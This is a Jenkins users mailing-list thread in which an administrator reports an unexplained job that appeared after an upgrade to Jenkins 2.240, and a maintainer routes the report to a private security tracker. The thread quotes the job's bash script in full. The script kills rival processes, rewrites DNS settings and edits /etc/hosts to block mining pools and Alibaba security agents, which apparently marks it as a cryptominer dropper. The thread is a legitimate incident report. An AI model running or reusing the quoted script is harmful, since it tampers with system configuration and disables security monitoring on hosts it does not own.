Randall/Daniel, if there does end up being malware for this release would you mind replying on this thread?
On Monday, June 22, 2020 at 1:00:09 PM UTC-5, Daniel Beck wrote: > > Thanks for your report. > > I filed an issue on your behalf in the Jenkins project's private security > issue tracker. You should have gotten an email notification from Jira about > it. Please provide more information there to help us investigate. > > > > On 22. Jun 2020, at 19:15, Randall Becker <[email protected] > <javascript:>> wrote: > > > > Hi All, > > > > We just installed Jenkins 2.240 and suddenly there is a job with some > really strange content, including: > > > > #!/bin/bash > > > > threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' | > head -n 1); > > hostHash=$(hostname -f | md5sum | cut -c1-8); > > echo "${hostHash} - ${threadCount}"; > > ktr () { > > killall trace;pkill -9 -f trace;killall -s SIGKILL trace > > killall vunix;pkill -9 -f vunix;killall -s SIGKILL vunix > > killall viunix;pkill viunix;killall -s SIGKILL viunix > > kill -9 $(ps -ux | grep trace | awk '{ print $2 }') > > kill -9 $(ps -ux | grep vunix | awk '{ print $2 }') > > kill -9 $(ps -ux | grep viunix | awk '{ print $2 }') > > echo kill > > } > > > > ktr > > ktr > > ktr > > echo plsfoodforcatsnlove > > echo 'nameserver 1.1.1.1' > /etc/resolv.conf;echo 'nameserver 8.8.8.8' > >> /etc/resolv.conf;echo 'nameserver 180.76.76.76' >> /etc/resolv.conf > > echo "0.0.0.0 blockchain.info" >> /etc/hosts;echo "0.0.0.0 > 35.225.36.167" >> /etc/hosts;echo "0.0.0.0 100.100.25.3 > jsrv.aegis.aliyun.com" >> /etc/hosts > > echo "0.0.0.0 100.100.25.4 update.aegis.aliyun.co" >> /etc/hosts;echo > "0.0.0.0 185.164.72.119" >> /etc/hosts;echo "0.0.0.0 163.172.191.181" >> > /etc/hosts > > echo "0.0.0.0 pool.supportxmr.com" >> /etc/hosts;echo "0.0.0.0 > pinto.mamointernet.icu" >> /etc/hosts;echo "0.0.0.0 sdk.bce.baidu.com" >> > /etc/hosts > > echo "0.0.0.0 lsd.systemten.org" >> /etc/hosts; > > echo "0.0.0.0 pool.minexmr.com" >> /etc/hosts > > echo "0.0.0.0 minexmr.com" >> /etc/hosts > > > > This is really creepy because this script cannot possibly run on our > system (the good part). The bad part is that no one in our organization > created this job. Is it possible that there is some malware floating > around? Our Jenkins instance is hiding behind a firewall so there's no way > in. > > > > Thanks, > > Randall > > > > -- > > You received this message because you are subscribed to the Google > Groups "Jenkins Users" group. > > To unsubscribe from this group and stop receiving emails from it, send > an email to [email protected] <javascript:>. > > To view this discussion on the web visit > https://groups.google.com/d/msgid/jenkinsci-users/389e7848-bad2-4044-ab9d-c3fd0f106256o%40googlegroups.com. > > > > -- You received this message because you are subscribed to the Google Groups "Jenkins Users" group. To unsubscribe from this group and stop receiving emails from it, send an email to [email protected]. To view this discussion on the web visit https://groups.google.com/d/msgid/jenkinsci-users/6004d523-9169-46dc-88f1-47c46542d6a3o%40googlegroups.com.
